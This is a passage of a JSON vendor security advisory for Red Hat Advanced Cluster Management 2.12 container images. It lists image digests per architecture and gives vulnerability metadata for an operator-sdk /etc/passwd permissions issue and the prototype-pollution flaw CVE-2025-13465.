"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "operator-sdk: privilege escalation due to incorrect permissions of /etc/passwd"
},
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
